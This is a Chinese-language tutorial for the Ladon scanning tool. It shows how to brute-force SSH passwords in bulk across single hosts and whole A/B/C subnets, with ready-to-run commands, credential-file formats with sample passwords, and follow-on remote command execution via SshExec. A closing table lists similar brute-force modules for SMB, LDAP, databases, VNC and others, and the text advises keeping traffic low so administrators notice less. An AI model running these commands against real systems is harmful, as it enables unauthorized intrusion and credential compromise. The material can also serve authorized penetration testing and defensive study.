〖教程〗Windows下使用Ladon批量爆破SSH弱口令

<% Visit %>

前言

对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。

利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台都可运行SSH。Kali Linux渗透测试平台默认配置SSH服务。SSH进行服务器远程管理,仅仅需要知道服务器的IP地址、端口、管理账号和密码,即可进行服务器的管理,网络安全遵循木桶原理,只要通过SSH撕开一个口子,对渗透人员来时这将是一个新的世界。

Ladon

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。6.5版本内置69个功能模块,外部模块17个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破12种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

SSHscan

Ladon内置SSH密码爆破SSHscan,支持内外网指定IP、批量IP、批量IP段(C段、B段、A段)、支持CIDR格式,支持自定义SSH端口。支持IP帐密检测(check.txt),支持帐密组检测(userpass.txt),支持传统用户密码检测(user.txt、pass.txt),密码爆破前程序会自动检测端口是否开放,无需另外扫描22端口,准备好密码就可以批量爆破。

SSH服务版本识别

SSH服务默认为22端口,在不配置帐密的情况下,使用sshscan可探测SSH服务版本,通过SSH服务信息可确定目标操作系统版本,也可进行下一步渗透,如OpenSSH某个版本存在RCE,通过RCE直接getshell,就不需要爆破了,所以先做什么后做什么很重要。不是动不动就无脑的全端口扫描,全漏洞扫描,默认端口就是SSH,就有漏洞,用的就是简单密码,还要做很多动作,产生很多流量,让管理员更容易发现?

1
Ladon 192.168.1.8 sshscan

如图,扫描C段开放SSH服务主机仅需3秒,探测到一台Ubuntu主机开放SSH服务,使用OepnSSH7.6
image

SSH密码爆破/暴力破解

配置密码爆破参数

1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认

user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码

例子

check/验证

check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege

userpass/帐密组

userpass.txt
root k8gege
root 123456

user & pass /传统帐密

user.txt
root

pass.txt
toor
k8gege

批量验证

场景:通过配置文件读取到其它机器帐密时,可使用check.txt批量验证IP对应帐密是否可用,check可指定对应端口,默认为22,若被修改则在IP后加上自定义端口。
check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege

1
Ladon SshScan

指定IP

可使用帐密组userpass.txt或者传统帐密,支持自定义SSH端口,Target格式(IP:Port)

1
2
Ladon 192.168.1.8 sshscan
Ladon 192.168.1.8:78 SshScan (自定义SSH端口78)

扫描C段

可使用帐密组userpass.txt或者传统帐密(user.txt、pass.txt)

1
2
Ladon 192.168.1.8/c sshscan
Ladon 192.168.1.8/24 sshscan

扫描B段

可使用帐密组userpass.txt或者传统帐密(user.txt、pass.txt)

1
Ladon 192.168.1.8/b sshscan

扫描A段

可使用帐密组userpass.txt或者传统帐密(user.txt、pass.txt)

1
Ladon 192.168.1.8/a sshscan

批量IP

可使用帐密组userpass.txt或者传统帐密(user.txt、pass.txt),同样支持自定义端口,不指定为默认22端口
ip.txt
192.168.1.8
192.168.1.5
192.168.1.109:48

1
Ladon SshScan

批量C段

可使用帐密组userpass.txt或者传统帐密(user.txt、pass.txt),同样支持自定义端口,不指定为默认22端口
ip24.txt
192.168.1.
10.1.5.

1
Ladon SshScan

批量B段

可使用帐密组userpass.txt或者传统帐密(user.txt、pass.txt),同样支持自定义端口,不指定为默认22端口
ip16.txt
192.168.
10.1.

1
Ladon SshScan

如图,爆破指定主机SSH密码、爆破C段主机SSH密码
image

SSH执行命令

1
2
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

image

LadonGo全平台版

1
2
Ladon SshCmd host port user pass cmd
Ladon WinrmCmd host port user pass cmd

image

注意事项

个别模块依赖DLL最好使用K8提供的,官网或第3方的不一定能用、兼容性不好等。如SSH爆破用的Renci.SshNet.dll,我曾经下过官方的不同版本发现有些能用有些不能用,也有同学不知从哪下的,刚和我说SSHscan在2012 R2没反应只扫描了端口然后就没了,然后我看它名称全是小写的和我提供的不一样,突然想起这个DLL的兼容性问题,让他下载Ladonlib之后果然可以用了。VNC的DLL也是一样官方源码的有个BUG

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

其它模块

Ladon其它密码爆破模块同理,若需要检测其它网络认证密码,将sshscan改成对应模块即可,如检测SMB帐密(Ladon 192.168.1.1/24 SmbScan)

ID 模块名称 功能说明 返回结果 依赖
1 SmbScan SMB密码爆破(Windows) 检测过程、成功密码、LOG文件
2 WmiScan Wmi密码爆破(Windowns) 检测过程、成功密码、LOG文件
3 IpcScan Ipc密码爆破(Windows) 检测过程、成功密码、LOG文件
4 LdapScan AD域密码爆破(Windows) 检测过程、成功密码、LOG文件
5 SmbHashScan SMB HASH密码爆破(Windows) 检测过程、成功密码、LOG文件
6 WmiHashScan WMI HASH密码爆破(Windows) 检测过程、成功密码、LOG文件
7 SshScan SSH密码爆破(Linux) 检测过程、成功密码、LOG文件 Renci.SshNet.dll
8 MssqlScan Mssql数据库密码爆破 检测过程、成功密码、LOG文件
9 OracleScan Oracle数据库密码爆破 检测过程、成功密码、LOG文件 DDTek.Oracle.dll
10 MysqlScan Mysql数据库密码爆破 检测过程、成功密码、LOG文件 MySql.Data.dll
11 WeblogicScan Weblogic后台密码爆破 检测过程、成功密码、LOG文件
12 VncScan VNC远程桌面密码爆破 检测过程、成功密码、LOG文件 VncSharp.dll
13 FtpScan Ftp服务器密码爆破 检测过程、成功密码、LOG文件
14 RarScan Rar压缩包密码爆破 检测过程、成功密码、LOG文件 Rar.exe
15 TomcatScan Tomcat后台登陆密码爆破 检测过程、成功密码、LOG文件
16 HttpBasicScan HttpBasic401认证密码爆破 检测过程、成功密码、LOG文件